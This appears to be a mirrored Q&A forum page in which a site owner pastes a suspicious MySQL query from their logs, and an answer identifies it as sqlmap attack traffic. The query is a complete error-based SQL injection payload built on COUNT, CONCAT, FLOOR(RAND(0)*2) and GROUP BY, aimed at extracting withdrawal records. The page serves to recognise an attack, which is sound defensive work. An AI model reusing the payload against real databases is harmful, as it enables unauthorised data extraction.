Logo Questions Linux Laravel Mysql Ubuntu Git Menu
 

Mysql Injection query?

Tags:

mysql

SELECT `u`.`login`,`u`.`fullname`,`ur`.`user_id`,`ur`.`refer_id` 
FROM 
`user_referrals` AS `ur` 
 JOIN 
(SELECT id,login,fullname FROM users WHERE id=4  
 AND 
(SELECT 3039 FROM 
(SELECT COUNT(*),CONCAT(0x7170707a71,(SELECT 
MID((IFNULL(CAST(id AS CHAR),0x20)),1,54) 
 FROM 
 cms_withdrawal WHERE user_id=3454 and timestamp>1494075125 LIMIT 
1,1),0x7176716271,FLOOR(RAND(0)*2))x 
FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)) AS `u`  
WHERE (ur.user_id=4135 AND ur.refer_id=4 AND (SELECT 3039 
FROM
(SELECT COUNT(*),CONCAT(0x7170707a71,(SELECT MID((IFNULL(CAST(id AS 
CHAR),0x20)),1,54) FROM cms_withdrawal WHERE user_id=3454 and 
timestamp>1494075125 LIMIT 1,1),0x7176716271,FLOOR(RAND(0)*2))x  
FROM 
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)) OR (ur.refer_id=4135 AND 
ur.user_id=4 AND (SELECT 3039 FROM(SELECT COUNT(*),CONCAT(0x7170707a71,
(SELECT MID((IFNULL(CAST(id AS CHAR),0x20)),1,54) 
FROM cms_withdrawal WHERE 
user_id=3454 and timestamp>1494075125 LIMIT 
1,1),0x7176716271,FLOOR(RAND(0)*2))x 
FROM 
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)) AND ur.level=1 LIMIT 1

I see it in my mysql logs. What is that?

like image 734
Dmitrij Kotenev Avatar asked Dec 14 '25 04:12

Dmitrij Kotenev


1 Answers

That query is part of an sqlmap attack. Sqlmap is used for penetration-testing (hacking) purposes.

In this issue you can see that the code is part of what they use in their statements >> http://github.com/sqlmapproject/sqlmap/issues/209

sqlmap: http://github.com/sqlmapproject/sqlmap

like image 120
Xatenev Avatar answered Dec 16 '25 20:12

Xatenev



Donate For Us

If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!